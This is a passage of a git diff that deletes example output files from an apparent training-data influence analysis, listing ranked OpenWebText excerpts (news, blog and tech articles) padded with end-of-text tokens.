-Here’s one theory for what’s going on: In recent years, gun sales have been driven by fears of gun confiscations. Gun sales soared after Obama’s election in 2008 and again when he was reelected in 2012, as people worried that the president would begin to confiscate the nation’s firearms. - -In contrast, gun owners have little to fear from a Trump presidency or a Republican Congress. So gunmakers are likely to make fewer sales over the next four years.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 2; Score = 503808.0 -<|begin_of_text|>WOMEN and men face double-standards. That this should show up in the language is no surprise. Men who put themselves forward at work are “assertive”, women who do the same are more often “pushy” or “bossy”; men are “persistent” whereas women are “nagging”; men are “frustrated”, women “upset”. A man has a lot to say; a woman is “chatty”. A man discusses the doings of his colleagues and rivals; a woman “gossips”. - -Readers tempted to doubt can check for themselves. For an impressionistic survey, type “gossip” into Google, click on “images” and see who appears to be doing it; then try the same with “nagging” and “bossy”. For hard data, try Google’s “Ngram” viewer, which shows the frequency of words and phrases among the hundreds of billions of words in the books scanned by Google, spanning centuries. One of the most common words following “gossiping” is “old”. And the most common words to follow “gossiping old” are, in this order: “women”, “woman”, “men”, “lady” and “ladies”. - -Some words are trickier than mere double-standards: those using them may think they are paying a kind of compliment, whereas what is heard is something between condescension and insult. A case in point is “feisty”. Those who use it might think that the word connotes “spirited”. It is often heard by women, though, as carrying a whiff of surprise that a woman would show such spirit. - -“Nonsense”, some will reply. The Economist has used “feisty” recently to refer to Greece’s leftist government, a South African tabloid, a (male) Argentinian presidential candidate and Singaporean opposition bloggers. But it is also used fairly frequently with female figures. The common thread seems to be a sense of smallness or underdog status: nobody calls a jowly dictator or heavyweight boxer “feisty”. Google’s book data say much the same. “Little” is one of the most common words to follow “feisty”, and the most common words to follow “feisty little” are “girl”, “man”, “thing”, “guy”, “woman” and “lady”. Rounding out the top ten words following “feisty little”, intriguingly, are “Irishman” and “bastard -================================================================================ -Rank = 3; Score = 456704.0 -<|begin_of_text|>Utah’s Wasatch GOP has two chairmen. One of them is named James C. Green. Mr. Green has some big ideas and he decided to share one of those big ideas with the public. - -Here’s Mr. Green’s caveman missive: - -Equal Pay For Women Has Consequences - -Editor: Here's the problem with the Equal Pay bill being considered by the Utah Legislature... Traditionally men have earned more than women in the workplace because they are considered the primary breadwinners for families. They need to make enough to support their families and allow the Mother to remain in the home to raise and nurture the children. - -If businesses are forced to pay women the same as male earnings, that means they will have to reduce the pay for the men they employ... simple economics. If that happens, then men will have an even more difficult time earning enough to support their families, which will mean more Mothers will be forced to leave the home (where they may prefer to be) to join the workforce to make up the difference. - -And as even more women thus enter the workforce that creates more competition for jobs (even men's jobs) and puts further downward pressure on the pay for all jobs... meaning more and more Mothers will be forced into the workforce. And that is bad for families and thus for all of society. - -It's a vicious cycle that only gets worse the more equality of pay is forced upon us. It's a situation of well-meaning intentions, but negative unintended consequences. - -We should encourage our Legislators to drop the whole notion. Let the marketplace determine what free-market forces should prevail. It is not the role of government to dictate to businesses what they should pay anyway... either as a Minimum Wage or Equal Pay for men and women. - -James C. Green - -Wasatch Co. GOP Vice-Chair<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -``` \ No newline at end of file diff --git a/examples/openwebtext/files/database.txt b/examples/openwebtext/files/database.txt deleted file mode 100644 index c11e132..0000000 --- a/examples/openwebtext/files/database.txt +++ /dev/null @@ -1,2212 +0,0 @@ -Query Sequence: -Prompt: Using a distributed database has many advantages.; Completion: It allows you to run the same application on multiple servers. This makes it easier to scale your application. It also allows you to have a single database that can be accessed by multiple servers. This makes it easier to manage your data and to make changes to your application. - -Top Influential Sequences: -================================================================================ -Rank = 0; Score = 20971520.0 -<|begin_of_text|>Bigfoot has been a staple of American folklore since the 19th century. Many people are convinced that Bigfoot is real. Others suggest that he is a cultural phenomenon. Some just want to believe. There is even a group, the Bigfoot Field Researchers Organization, that tracks Bigfoot sightings. And they have thousands of reports available online that date back to the late 19th century. The Internet, it seems, has everything. So, I took this data, all 4,586 records of it, and used it to build a classifier. It was a good model with pleasing metrics. I liked it. But then what? For some folks, the model is where the work ends. But I'm a developer and that's only half the solution. I've got a model but how do I use it? How do I put it in an application so that a user can, well, use it? I'm going to answer that question in this talk, and a bit more. I'll show you how I exposed my Bigfoot classifier to the Internet as a REST-based API written in Python. And we'll tour a couple of applications I wrote to use that API: a web-based application written in JavaScript and an iOS application written in Swift. For the model itself, I'll use DataRobot since it's quick and easy. And, I work there! When we're done, you'll know how to incorporate a model into an API of your own and how to use that API from your application. And, since all my code is on GitHub, you'll have some examples you can use for your own projects. As a bonus, you'll have 4,586 Bigfoot sightings to play with. And who doesn't want that? **************************************************************** Guy started his career as gasp a COBOL programmer. But don’t hold that against him, it just gives him perspective. He has spent much of his time programming in the most popular of the semi-colon delimited languages including C++, Java, and JavaScript. More recently he has been working with Python and machine learning. In addition to programming computers, Guy had a background in electronics and enjoys building circuits, burning himself with a soldering iron, and programming small hardware devices such as the Arduino and the Raspberry Pi. No one has actually paid him to do this sort of work… yet. Guy loves to speak and teach and will go to any conference that will give him an audience and teach anyone who wants to learn. He normally speaks about technology but has been known to -================================================================================ -Rank = 1; Score = 15663104.0 -<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". - -Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. - -In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden -================================================================================ -Rank = 2; Score = 15138816.0 -<|begin_of_text|>If you want to make money playing poker, you have to read your opponents without letting them read you. - -Stephen Harper sure is hard to read, but in the game of high-stakes poker over the election debates, he seems to have misread the other players. - -On Thursday, representatives of the NDP, Liberals, Greens and Bloc agreed to do one English and one French debate to be broadcast by CTV, CBC, Global and Radio Canada, which would reach millions of Canadian TVs. - -The Conservatives say they’re too busy with other debates. So far, they have agreed to debates put together by TVA, Maclean’s, the - -Globe and Mail and the Munk Debates. La Presse is likely next. - -The problem for the Tories is that the consortium of big broadcasters controls TV bandwidth, and they are refusing to cede control to the other media organizations. - -When British Prime Minister David Cameron stayed away from a similar debate recently, the British consortium went ahead without him. That didn’t help Cameron’s rival, Labour Leader Ed Miliband, because he got beat up by the leaders of smaller parties. - -The dynamic would be different here because many voters would like to have a different prime minister, but they disagree on whether it should be Thomas Mulcair or Justin Trudeau. - -If the two of them square off (with Elizabeth May) in the only English debate to be broadcast on millions of TV screens, the non-Tory voters might settle on one of them. If that happens, Harper would find it hard to keep his job. - -The numbers do not look good anyway. Friday’s Ekos poll for iPolitics shows the Tories in a three-way tie with the NDP and the Liberals. - -Worse still for him, he has little room to grow. About 40% of both Liberal and NDP supporters identify the other party as their second choice but only 13% of Liberal supporters and 8% of NDP supporters would consider voting Conservative. And 58% of Canadians would not consider voting Conservative under any circumstances. - -“If our numbers are correct, the Conservatives are in deep trouble,” said pollster Frank Graves. “They’ve got very little room for growth, and they’re 12 points back … from where they were election night.” - -A security crisis might move that number, but the “balanced” budget, anti-terror talk and tax cuts haven’t done the trick. - -A big chunk of voters — Graves calls them “promiscuous progressives” — want to see the back of Harper. If the biggest debate of the campaign takes -================================================================================ -Rank = 3; Score = 10289152.0 -<|begin_of_text|>Lottery mathematics is used to calculate probabilities of winning or losing a lottery game. It is based heavily on combinatorics, particularly the twelvefold way and combinations without replacement. - -Choosing 6 from 49 [ edit ] - -In a typical 6/49 game, each player chooses six distinct numbers from a range of 1-49. If the six numbers on a ticket match the numbers drawn by the lottery, the ticket holder is a jackpot winner—regardless of the order of the numbers. The probability of this happening is 1 in 13,983,816. - -The chance of winning can be demonstrated as follows: The first number drawn has a 1 in 49 chance of matching. When the draw comes to the second number, there are now only 48 balls left in the bag, because the balls are drawn without replacement. So there is now a 1 in 48 chance of predicting this number. - -Thus for each of the 49 ways of choosing the first number there are 48 different ways of choosing the second. This means that the probability of correctly predicting 2 numbers drawn from 49 in the correct order is calculated as 1 in 49 × 48. On drawing the third number there are only 47 ways of choosing the number; but of course we could have arrived at this point in any of 49 × 48 ways, so the chances of correctly predicting 3 numbers drawn from 49, again in the correct order, is 1 in 49 × 48 × 47. This continues until the sixth number has been drawn, giving the final calculation, 49 × 48 × 47 × 46 × 45 × 44, which can also be written as 49! ( 49 − 6 )! {\displaystyle {49! \over (49-6)!}} or 49 factorial divided by 43 factorial. This works out to 10,068,347,520, which is much bigger than the ~14 million stated above. - -However; the order of the 6 numbers is not significant. That is, if a ticket has the numbers 1, 2, 3, 4, 5, and 6, it wins as long as all the numbers 1 through 6 are drawn, no matter what order they come out in. Accordingly, given any set of 6 numbers, there are 6 × 5 × 4 × 3 × 2 × 1 = 6! or 720 -================================================================================ -Rank = 4; Score = 8585216.0 -<|begin_of_text|>On July 11, 2016, 6 months after the first published version of Zappa, Amazon announced the preview release of Chalice, now the Python Severless Microframework for AWS. This was a fairly big shock to our community at the time, as it looked as though our Free and Open Source project was being undercut by Amazon's propietary offering. Not only that, but it felt like their interface and even their presentation of the product was a̶ ̶d̶i̶r̶e̶c̶t̶ ̶r̶i̶p̶-̶o̶f̶f̶ ̶o̶f̶ inspired by our efforts, potentially designed to ~~~trick~~~ help consumers and lock them into the AWS ecosystem. - -I don't want to attribute any direct malice there, (this is probably just a case of a good idea being executed in multiple ways), but Amazon does have a fairly long history of building their own proprietary or locked-in versions of software products and services built on top of AWS infrastructure. - -So, now that both products have matured even further, I think it's time that we do a comparison of the two frameworks. Obviously, as one of the authors of Zappa I'm strongly biased, so take my opinions for what they are, but it is my strong belief that although Chalice has some interesting features, Zappa is the vastly superior product for these important reasons: - -Zappa does not lock you in to the AWS ecosystem. - -to the AWS ecosystem. Zappa has vastly more useful features. - -. Zappa is battle-tested, used in production by medical, scientific and banking users. - -Against Vendor Lock-In - -This is the big headline here: Chalice locks you into using AWS services - Zappa doesn't. - -With Zappa, you can run existing Python web applications on AWS Lambda thanks to the magic of WSGI. More importantly, you can leave AWS at any time, meaning you can run the same application on any web server your like, be it VPS, on Heroku, or on your own bare metal. (You will lose some of the event-driven benefits which AWS can provide, but you will always have the option to use other replacements if that's what you decide.) - -With Chalice, you will have to re-write your application to use the Chalice framework, and after that it will only ever be able to be run on AWS infrastructure. - - -================================================================================ -Rank = 5; Score = 8519680.0 -<|begin_of_text|>Renting Dumpsters Posted on December 5, 2018 | By STEVE Whenever people have a task, it is easy to generate waste and piling up garbage can be a main source of worry. This is not only with regards to taking up space but also in conditions of polluting the environment unnecessarily. Therefore, how perform these worries are taken by you aside? This can be done by opting to use 20 yard dumpsters philadelphia simply. These are offered by local rental businesses and are designed to alleviate the worries of coping with trash from your brain. There are many of these rental companies in the marketplace and as such, it ought not to be difficult so that you can get the same. The local rental businesses will make sure that you recycle your waste in an eco-friendly method and at the same period, make the process easy. By using these eco-friendly dumpsters, you not really just ensure that your encircling is clean and gives you the ideal life-style but it will also make sure that you enjoy great wellness. As a result, this will give you great endurance and boost your probabilities of taking pleasure in a treatment free of charge way of living. These can be utilized in different fronts and places such as churches, house owners, areas and additional businesses. For this good reason, they are known to provide all round services to all these combined groups. There are instances when you might have dangerous waste products and this provides the ideal chance that you can ensure that you get rid of the same in a secure way. Dumpsters may end up being availed in various designs seeing that good as sizes and this makes it all easy for individuals to help to make buys based on their requirements. Another main benefit connected with this type of waste materials disposal is usually the truth that the consumer can place it in an area of their choice. This makes it simple to make sure that the clean up process is simple and effective on your part as well. It is normally essential to take note that the rental companies are also accountable for making sure that they are eliminated from your property once you are completed using the same and they can adhere to your time routine. What is more, in many situations, these ongoing companies will adhere to certain safety procedures when they are putting the same on site. At this true point, it is important to note that dumpsters that are provided by professional local rental businesses are also the perfect way to eliminate waste that is produced on building sites whether it is green backyard, commercial or home keep waste. What is usually even more, this provides you -================================================================================ -Rank = 6; Score = 8519680.0 -<|begin_of_text|>Today, we are announcing the general availability of App Service Isolated, which brings the simplicity of multi-tenant App Service to the secure, dedicated virtual networks powered by App Service Environment (ASE). - -Azure App Service is Microsoft’s leading PaaS (Platform as a Service) offering hosting over 1 million external apps and sites. It helps you build, deploy and scale web, mobile and API apps instantaneously without worrying about the underlying infrastructure. It allows you to leverage your existing skills by supporting an increasing array of languages, frameworks, and popular OSS, and has built-in capabilities that streamline your CI/CD pipeline. ASE was introduced in 2015 to offer customers network isolation, enhanced control, and increased scale options. The updated ASE capabilities that comes with the new pricing tier, App Service Isolated, now allow you to run apps in your dedicated virtual networks with even better scale and performance through an intuitive user experience. - -Streamlined scaling - -Scaling up or out is now easier. The new ASE eliminates the need to manage and scale worker pools. To scale, either choose a larger Isolated plan (to scale up) or add instances (to scale out), just like the multi-tenant App Service. It’s that easy. To further increase scaling flexibility, App Service Isolated comes with a maximum default scale of 100 Isolated plan instances. You now have more capacity for large implementations. - -Upgraded performance - -The new ASE uses dedicated Dv2-based machines boasting faster chipsets, SSD storage, and twice the memory per core when compared to the first generation. The dedicated worker sizes for the new ASE are 1 core with 3.5 GB RAM, 2 cores with 7 GB RAM, and 4 cores with 14 GB RAM. With this upgraded infrastructure, you will be able to run your apps with lower latency, have more power to handle heavier workloads, and support more users. - -Simplified experience - -Creating the new ASE is easy. By selecting the Isolated pricing tier, App Service will create an App Service Plan (ASP) and a new ASE directly. You will just need to specify the Virtual Network that you want to deploy your applications to. There is no separate workflow required to spin up a new ASE in your secure, dedicated virtual networks. - -We’ve made App Service Environment (ASE) faster, more efficient, and easier to deploy into your virtual network, enabling you to run apps with Azure App Service at high scale in an isolated network environment. Check out the Azure Friday video. Partners and customer can also -================================================================================ -Rank = 7; Score = 8323072.0 -<|begin_of_text|>Only recently the Cockpit project was launched, aiming at providing a web based management interface for various servers. It already leaves an interesting impression for simple management tasks – and the design is actually well done. - -I just recently came across the only three month old Cockpit project. The mission statement is clear: - -Cockpit is a server manager that makes it easy to administer your GNU/Linux servers via a web browser. - -The web page also states three aims: beginners friendly interface, multi server management – and that there should be no interference in mixed usage of web interface and shell. Especially the last point caught my attention: many other web based solutions introduce their own magic, thus making it sometimes tricky to co-administrate the system manually via the shell. The listed objectives also make clear that cockpit does not try to replace tools that go much deeper into the configuration of servers, like Webmin, which for example offers modules to configure Apache servers in a quite detailed manner. Cockpit tries to simply administrate the server, not the applications. I must admit that I would always do such a application configuration manually anyway… - -The installation of Cockpit is a bit bumpy: besides the requirement of tools like systemd which limits the usage to only very recent distributions (excluding Ubuntu, I guess) there are no packages yet, some manual steps are required. A post at unshut.me highlights the necessary steps for Fedora which I followed: in includes installing dependencies, setting firewall rules, etc. – and in the end it just works. But please note, in case you wanna give it a try: it is not ready for production. Not at all. Use virtual machines! - -What I did see after the installation was actually rather appealing: a clean, yet modern web interface offering the most important and simple tasks a sysadmin might need in a daily routine: quickly showing the current health state, providing logs, starting and stopping services, creating new users, switching between servers, etc. And: there is even a working rescue console! - -Main login view Default server overview, showing the possible tasks as well as the current health of the system. Default server view in wide screen browser Detail view of host name and system basics Network traffic – a click onto on of the health statistics brings up a more detailed view. Listing services – here it becomes obvious how much Cockpit actually is build upon systemd. The log watcher accesses the systemd journal – once again a reason why systemd is a requirement for Cockpit. Adding a new server to Cockpit. Two servers are registered and can be accessed in -================================================================================ -Rank = 8; Score = 7897088.0 -<|begin_of_text|>Share The Latest News - -Earlier this year LG, in partnership with Valve, showcased a prototype of their upcoming LG VR headset at GDC 2017 which is now rumored to be called UltraGear. So far we know that the upcoming headset will boast some new specs that differ from current headset manufacturers. - -LG UltraGear VR Headset Specifications: - -Two panels (one for each eye) with a resolution of 1440 x 1280 each - -OLED display from LG - -3.64 inches diagonal - -90 Hz refresh rate - -110 degree FOV - -With new reports from Letsgo Digital, we have discovered that LG has filed new patents that might greatly change how users will put on and take off the upcoming LG VR headset. Through the images seen in the patent, it clearly outlines how the headset can be opened in the middle which allows users to rest it on their shoulders if they so choose. - -This makes it easier to take quick rests from VR and also makes it easier to maneuver around if you had to take off the headset for any reason. We have not yet seen any major headset manufacturer do this where the HMD can be split down the middle. - -In addition, there will be a knob on the back which will allow you to control the sizing of the headset for your head which was a great feature added on the PSVR and the new HTC Vive deluxe head straps. - -There will also be an area where it looks like the headset will allow you dock your earbuds on the back. We aren’t quite sure how this works but it looks as though that it pulls in and out. - -You can find the rest of the images here for the recently filed patents. This does not mean that this will be final but it’s quite an interesting design. It might also be possible that LG will upgrade the currently known specs such as the display panels and FOV.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 9; Score = 7602176.0 -<|begin_of_text|>Will White of Mapbox shared the following guest post with me. In the post, Will describes how they use EC2 Spot Instances to economically process the billions of data points that they collect each day. - -I do have one note to add to Will’s excellent post. We know that many AWS customers would like to create Spot Fleets that automatically scale up and down in response to changes in demand. This is on our near-term roadmap and I’ll have more to say about it before too long. - -— Jeff; - -The largest automotive tech conference, TU-Automotive, kicked off in Detroit this morning with almost every conversation focused on strategies for processing the firehose of data coming off connected cars. The volume of data is staggering – last week alone we collected and processed over 100 million miles of sensor data into our maps. - -Collecting Street Data - -Rather than driving a fleet of cars down every street to make a map, we turn phones, cars, and other devices into a network of real-time sensors. EC2 Spot Instances process the billions of points we collect each day and let us see every street, analyze the speed of traffic, and connect the entire road network. This anonymized and aggregated data protects user privacy while allowing us to quickly detect road changes. The result is Mapbox Drive, the map built specifically for semi-autonomous driving, ride sharing, and connected cars. - -Bidding for Spot Capacity - -We use the Spot market to bid on spare EC2 instances, letting us scale our data collection and processing at 1/10th the cost. When you launch an EC2 Spot instance you set a bid price for how much you are willing to pay for the instance. The market price (the price you actually pay) constantly changes based on supply and demand in the market. If the market price ever exceeds your bid price, your EC2 Spot instance is terminated. Since spot instances can spontaneously terminate, they have become a popular cost-saving tool for non-critical environments like staging, QA, and R&D – services that don’t require high availability. However, if you can architect your application to handle this kind of sudden termination, it becomes possible to run extremely resource-intensive services on spot and save a massive amount of money while maintaining high availability. - -The infrastructure that processes the 100 million miles of sensor data we collect each week is critical and must always be online, but it uses EC2 Spot Instances. We do it by running two Auto Scaling groups, a Spot group and an On-Demand group, that share a single Elastic Load -================================================================================ -Rank = 10; Score = 7405568.0 -<|begin_of_text|>In the last year, Progressive Web Apps have become an incredibly popular way to build next generation apps. PWAs bring many advantages to the table, and in today’s post I’d like to share why we think you should care. - -Why should I care about PWAs? - -PWAs bring unique advantages to the table for developers building consumer facing apps. They allow developers to completely skip the app stores and instead simply deploy to a web server. This allows you to get your app out faster and to more people than you would be able to with deploying to the App Store and Google Play. Also, because you are not tied to the app store, this means that updates can be immediately available to everyone using your app, by simply pushing your new code to your web server. And because PWAs run in the browser, your single PWA can then be reached from just a click on a URL, greatly reducing the barrier to entry to your app! - -PWAs also bring a ton of new advantages to the table for businesses and enterprises. Because of the fact that with a PWA you don’t have to package your app for any specific native platform, or submit that app to any native app store, your time to market can be much faster. Just push to a web server and your PWA is available to everyone. - -For users of your app, PWAs offer a consistent experience no matter what device they are using, or how slow or flaky their network connection is. There’s no need to sit and wait while your app they are wanting to use is downloading and installing. Need something in a hurry? There is nothing much faster than tapping a 